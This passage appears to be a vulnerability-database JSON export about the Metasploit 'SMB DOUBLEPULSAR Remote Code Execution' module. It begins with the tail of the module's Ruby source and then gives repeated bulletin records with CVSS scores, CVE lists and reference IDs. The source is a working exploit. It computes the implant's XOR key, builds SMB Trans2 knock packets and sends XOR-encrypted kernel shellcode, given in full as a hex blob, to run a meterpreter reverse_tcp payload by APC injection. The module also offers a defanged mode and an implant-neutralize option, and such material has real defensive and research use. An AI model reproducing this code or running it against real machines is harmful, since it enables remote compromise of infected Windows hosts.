true\n },\n 'Targets' => [\n ['Execute payload (x64)',\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n ],\n ['Neutralize implant',\n 'DefaultOptions' => {\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => [CRASH_OS_DOWN],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }.freeze\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }.freeze\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? 
ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack1('V')\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n print_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg = 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 (32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n print_error('DOUBLEPULSAR not detected or disabled')\n CheckCode::Safe\n else\n print_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload (x64)'\n unless @xor_key\n fail_with(Failure::NotFound, 
'XOR key not found')\n end\n\n if @arch == ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n 
return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n pkt['Payload'].v['ParamCountTotal'] = param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack('S<')\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from 
external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\n generate_process_hash(proc_name.upcase) +\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" 
\\\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\n 
\"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n"}, "lastseen": "2021-11-07T11:46:19", "differentElements": ["sourceData"], "edition": 66}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "2af769d2f0f395f48de4732f348253ce", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. 
While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-11-12T11:50:45", "history": [], "viewCount": 114, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142181", 
"PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96709", "SMNTC-96703", "SMNTC-96704", "SMNTC-96706", "SMNTC-96705"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0419", "CPAI-2017-0205", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0200", "CPAI-2017-0177"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": 
["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-12T11:50:45", "rev": 2}, "score": {"value": 6.7, "vector": "NONE", "modified": "2021-11-12T11:50:45", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": ""}, "lastseen": "2021-11-12T11:50:45", "differentElements": ["sourceData"], "edition": 67}, {"bulletin": {"id": 
"1337DAY-ID-33895", "vendorId": null, "hash": "90b8d0833fc6be46c6824f7750ed36c5", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-11-12T17:48:41", "history": [], "viewCount": 114, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", 
"AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM", "MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-29702"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146"]}, {"type": "symantec", 
"idList": ["SMNTC-96704", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96703", "SMNTC-96706"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0419", "CPAI-2017-0177", "CPAI-2017-0200", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": 